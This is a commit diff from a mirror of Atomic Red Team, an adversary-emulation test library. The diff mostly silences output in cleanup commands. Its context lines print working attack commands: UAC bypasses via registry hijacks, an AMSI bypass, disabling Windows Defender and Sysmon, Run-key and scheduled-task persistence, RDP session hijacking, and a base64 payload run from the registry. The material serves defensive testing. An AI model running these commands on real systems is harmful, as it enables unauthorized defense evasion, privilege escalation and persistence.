security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-04-08 18:49:16 +00:00
parent 23620c707a
commit 7d07686f60
10 changed files with 57 additions and 51 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/index.yaml
+36 -30
View File
@@ -3216,8 +3216,8 @@ persistence:
sc.exe create #{service_name} binPath= #{binary_path}
sc.exe start #{service_name}
cleanup_command: |
sc.exe stop #{service_name}
sc.exe delete #{service_name}
sc.exe stop #{service_name} >nul 2>&1
sc.exe delete #{service_name} >nul 2>&1
- name: Service Installation PowerShell
description: |
Installs A Local Service via PowerShell.
@@ -3885,7 +3885,7 @@ persistence:
'
cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
/V "Atomic Red Team" /f
/V "Atomic Red Team" /f >nul 2>&1
'
- name: Reg Key RunOnce
@@ -3906,7 +3906,7 @@ persistence:
'
cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
/v 1 /f
/v 1 /f >nul 2>&1
'
- name: PowerShell Registry RunOnce
@@ -4059,7 +4059,7 @@ persistence:
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /TN spawn /F
cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
'
- name: Scheduled task Remote
@@ -4096,7 +4096,7 @@ persistence:
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F >nul 2>&1
'
- name: Powershell Cmdlet Scheduled Task
@@ -5726,7 +5726,7 @@ defense-evasion:
command: |
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe /c eventvwr.msc
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
'
- name: Bypass UAC using Event Viewer (PowerShell)
@@ -5769,7 +5769,8 @@ defense-evasion:
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
fodhelper.exe
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul
2>&1
'
- name: Bypass UAC using Fodhelper - PowerShell
@@ -5838,7 +5839,7 @@ defense-evasion:
copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe"
mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
cleanup_command: |
rd "\\?\C:\Windows \" /S /Q
rd "\\?\C:\Windows \" /S /Q >nul 2>nul
del "c:\testbypass.exe" >nul 2>nul
T1191:
technique:
@@ -6773,7 +6774,7 @@ defense-evasion:
name: command_prompt
elevation_required: false
command: "#{gup_executable}\n"
cleanup_command: 'taskkill /F /IM #{process_name}
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
'
T1140:
@@ -7130,7 +7131,7 @@ defense-evasion:
command: 'sysmon -u
'
cleanup_command: 'sysmon -i -accepteula
cleanup_command: 'sysmon -i -accepteula >nul 2>&1
'
- name: AMSI Bypass - AMSI InitFailed
@@ -7143,7 +7144,8 @@ defense-evasion:
name: powershell
elevation_required: false
command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n"
cleanup_command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)\n"
cleanup_command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
-ErrorAction Ignore\n"
- name: AMSI Bypass - Remove AMSI Provider Reg Key
description: |
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
@@ -7158,7 +7160,7 @@ defense-evasion:
'
cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers"
-Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
-Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
'
- name: Disable Arbitrary Security Windows Service
@@ -7180,8 +7182,8 @@ defense-evasion:
net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled
cleanup_command: |
sc.exe config #{service_name} start= auto
net.exe start #{service_name}
sc.exe config #{service_name} start= auto >nul 2>&1
net.exe start #{service_name} >nul 2>&1
- name: Disable PowerShell Script Block Logging
description: |
An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
@@ -7248,8 +7250,8 @@ defense-evasion:
sc config WinDefend start=disabled
sc query WinDefend
cleanup_command: |
sc start WinDefend
sc config WinDefend start=enabled
sc start WinDefend >nul 2>&1
sc config WinDefend start=enabled >nul 2>&1
- name: Tamper with Windows Defender Registry
description: |
Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be
@@ -11042,7 +11044,10 @@ defense-evasion:
. $PathToAtomicsFolder\T1093\src\Start-Hollow.ps1
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
cleanup_command: Stop-Process -Name "#{spawnto_process_name}"
cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
Ignore
'
T1055:
technique:
x_mitre_permissions_required:
@@ -13753,7 +13758,7 @@ privilege-escalation:
command: |
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe /c eventvwr.msc
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
'
- name: Bypass UAC using Event Viewer (PowerShell)
@@ -13796,7 +13801,8 @@ privilege-escalation:
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
fodhelper.exe
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul
2>&1
'
- name: Bypass UAC using Fodhelper - PowerShell
@@ -13865,7 +13871,7 @@ privilege-escalation:
copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe"
mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
cleanup_command: |
rd "\\?\C:\Windows \" /S /Q
rd "\\?\C:\Windows \" /S /Q >nul 2>nul
del "c:\testbypass.exe" >nul 2>nul
T1038:
technique:
@@ -14652,8 +14658,8 @@ privilege-escalation:
sc.exe create #{service_name} binPath= #{binary_path}
sc.exe start #{service_name}
cleanup_command: |
sc.exe stop #{service_name}
sc.exe delete #{service_name}
sc.exe stop #{service_name} >nul 2>&1
sc.exe delete #{service_name} >nul 2>&1
- name: Service Installation PowerShell
description: |
Installs A Local Service via PowerShell.
@@ -15369,7 +15375,7 @@ privilege-escalation:
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /TN spawn /F
cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
'
- name: Scheduled task Remote
@@ -15406,7 +15412,7 @@ privilege-escalation:
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F >nul 2>&1
'
- name: Powershell Cmdlet Scheduled Task
@@ -23455,8 +23461,8 @@ execution:
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
cleanup_command: |
cmd /c del /Q /F %SystemRoot%\Temp\art-marker.txt
cmd /c REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f
Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
- name: PowerShell Downgrade Attack
description: 'Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
@@ -24094,7 +24100,7 @@ execution:
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /TN spawn /F
cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
'
- name: Scheduled task Remote
@@ -24131,7 +24137,7 @@ execution:
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F >nul 2>&1
'
- name: Powershell Cmdlet Scheduled Task
@@ -26423,7 +26429,7 @@ lateral-movement:
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
net start sesshijack
cleanup_command: 'sc.exe delete sesshijack
cleanup_command: 'sc.exe delete sesshijack >nul 2>&1
'
- name: RDPto-DomainController
atomics/T1050/T1050.md
+2 -2
View File
@@ -40,8 +40,8 @@ sc.exe start #{service_name}
#### Cleanup Commands:
```cmd
sc.exe stop #{service_name}
sc.exe delete #{service_name}
sc.exe stop #{service_name} >nul 2>&1
sc.exe delete #{service_name} >nul 2>&1
```
atomics/T1053/T1053.md
+2 -2
View File
@@ -68,7 +68,7 @@ SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
#### Cleanup Commands:
```cmd
SCHTASKS /Delete /TN spawn /F
SCHTASKS /Delete /TN spawn /F >nul 2>&1
```
@@ -107,7 +107,7 @@ SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task"
#### Cleanup Commands:
```cmd
SCHTASKS /Delete /TN "Atomic task" /F
SCHTASKS /Delete /TN "Atomic task" /F >nul 2>&1
```
atomics/T1060/T1060.md
+2 -2
View File
@@ -71,7 +71,7 @@ REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team
#### Cleanup Commands:
```cmd
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1
```
@@ -106,7 +106,7 @@ REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v
#### Cleanup Commands:
```cmd
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1
```
atomics/T1073/T1073.md
+1 -1
View File
@@ -36,7 +36,7 @@ Upon execution, calc.exe will be opened.
#### Cleanup Commands:
```cmd
taskkill /F /IM #{process_name}
taskkill /F /IM #{process_name} >nul 2>&1
```
atomics/T1076/T1076.md
+1 -1
View File
@@ -35,7 +35,7 @@ net start sesshijack
#### Cleanup Commands:
```cmd
sc.exe delete sesshijack
sc.exe delete sesshijack >nul 2>&1
```
atomics/T1086/T1086.md
+2 -2
View File
@@ -349,8 +349,8 @@ iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Sof
#### Cleanup Commands:
```powershell
cmd /c del /Q /F %SystemRoot%\Temp\art-marker.txt
cmd /c REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f
Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
```
atomics/T1088/T1088.md
+3 -3
View File
@@ -52,7 +52,7 @@ cmd.exe /c eventvwr.msc
#### Cleanup Commands:
```cmd
reg.exe delete hkcu\software\classes\mscfile /f
reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
```
@@ -123,7 +123,7 @@ fodhelper.exe
#### Cleanup Commands:
```cmd
reg.exe delete hkcu\software\classes\ms-settings /f
reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1
```
@@ -232,7 +232,7 @@ mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
#### Cleanup Commands:
```cmd
rd "\\?\C:\Windows \" /S /Q
rd "\\?\C:\Windows \" /S /Q >nul 2>nul
del "c:\testbypass.exe" >nul 2>nul
```
atomics/T1089/T1089.md
+7 -7
View File
@@ -366,7 +366,7 @@ sysmon -u
#### Cleanup Commands:
```cmd
sysmon -i -accepteula
sysmon -i -accepteula >nul 2>&1
```
@@ -420,7 +420,7 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
#### Cleanup Commands:
```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false) -ErrorAction Ignore
```
@@ -449,7 +449,7 @@ Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-9
#### Cleanup Commands:
```powershell
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
```
@@ -483,8 +483,8 @@ sc.exe config #{service_name} start= disabled
#### Cleanup Commands:
```cmd
sc.exe config #{service_name} start= auto
net.exe start #{service_name}
sc.exe config #{service_name} start= auto >nul 2>&1
net.exe start #{service_name} >nul 2>&1
```
@@ -612,8 +612,8 @@ sc query WinDefend
#### Cleanup Commands:
```cmd
sc start WinDefend
sc config WinDefend start=enabled
sc start WinDefend >nul 2>&1
sc config WinDefend start=enabled >nul 2>&1
```
atomics/T1093/T1093.md
+1 -1
View File
@@ -38,7 +38,7 @@ Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -
#### Cleanup Commands:
```powershell
Stop-Process -Name "#{spawnto_process_name}"
Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
```